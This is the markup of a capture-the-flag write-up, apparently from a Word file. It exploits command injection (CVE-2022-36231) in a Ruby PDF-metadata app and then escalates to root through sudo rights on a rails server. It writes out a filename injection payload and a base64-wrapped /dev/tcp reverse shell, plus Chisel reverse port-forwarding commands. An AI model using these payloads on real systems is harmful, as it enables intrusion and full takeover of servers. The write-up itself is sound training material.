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INJECTION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a3oiv1hgebbo"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5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taking a look at the web application running on port 3000.</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38500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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observe that this is an application where we can upload a PDF file, and it will return the metadata of that file.</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21100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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uploading a PDF file, one significant observation we can make from the returned metadata is that the application is developed in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ruby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conducting some research on the internet about</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> “read pdf” </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> “pdfinfo”</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, I found the following vulnerability:</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CVE-2022-36231</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The software pdf_info, version 0.5.3 or earlier, is susceptible to operating system command injection when executing a method on a PDF::Info object.</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hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/affix/CVE-2022-36231</w:t>
        </w:r>
      </w:hyperlink>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learning about this command injection vulnerability, we can intercept the request when sending the PDF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After this step, we can insert our payload into the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"filename="</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> field.</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7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adding the payload </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;$(sleep 5) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we observe that the command was successfully executed due to the 5-second delay in the server response.</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that we have achieved Remote Code Execution, we can incorporate a reverse shell payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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-n "/bin/bash -c 'sh -i &gt;&amp; /dev/tcp/&lt;ip-vpn&gt;/4444 0&gt;&amp;1'" | base64 -w0</w:t>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-n &lt;base64&gt; | base64 -d | sh).pdf</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1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460500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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63900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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olm84fybq2yr" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1536700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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1txxn3pbj3gw" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>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h7geo9qc0c0f" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>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h5tn6b5ejnvz" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrading simple shell to fully interactive TTYs:</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54"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home directory of user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">deployer</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we are able to retrieve the first flag.</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7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our first user flag, it is time to escalate privileges to obtain our final flag. For this, we need to escalate to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user.</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using the command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observe that we have permission to execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/local/bin/rails server -e development -p 8000 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with root privileges, without needing to provide the root password.</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5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attempting to start the server in development mode, we notice that the application does not start due to another process already running, identified by the returned PID. Therefore, we can resolve the issue by removing the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">server.pid</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file and re-executing the command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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635000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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78000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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server running locally, we need to obtain another shell and configure port forwarding using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chisel</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This will allow us to redirect the local port 8000 connection to our machine, enabling us to open the application in our local browser.</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hyperlink r:id="rId21">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/jpillora/chisel</w:t>
        </w:r>
      </w:hyperlink>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57"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44600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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chisel on the server, we will first execute the following command on our local machine:</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server -p 9000 --reverse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1397000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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target machine, we execute:</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client &lt;ip-vpn&gt;:9000 R:8000:127.0.0.1:8000</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22400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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these steps, it is sufficient to access </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1:8000 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in our local browser. This way, we will be accessing the same application, but in this case, it is running as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user. Therefore, we can exploit it again to obtain a shell, allowing us to retrieve the final root flag.</w:t>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03500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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54200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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exploitation, we receive a shell as root and can retrieve </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/root/root.txt.</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successfully obtain the final flag.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId28" w:type="default"/>
      <w:headerReference r:id="rId29" w:type="first"/>
      <w:headerReference r:id="rId30" w:type="even"/>
      <w:footerReference r:id="rId31" w:type="default"/>
      <w:footerReference r:id="rId32" w:type="first"/>
      <w:footerReference r:id="rId33"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4">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="9"/>
    <w:bookmarkEnd w:id="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68"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5">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6">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3" name="image7.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image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Injection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1.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/jpillora/chisel" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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2.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xm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5.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/affix/CVE-2022-36231" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.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44BX8R4cWbb1q2gidnJJLG+5XA==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLmEzb2l2MWhnZWJibzIOaC5vbG04NGZ5YnEyeXIyDmguMXR4eG4zcGJqM2d3Mg5oLmg3Z2VvOXFjMGMwZjIOaC5oNXRuNmI1ZWpudnoyDmguMTc1ZjVjczk0ejBvOAByITFvOTlfbFdsSldwQ3ZUY2Q5VHRNbnJLWU96V2oyMWpiUw==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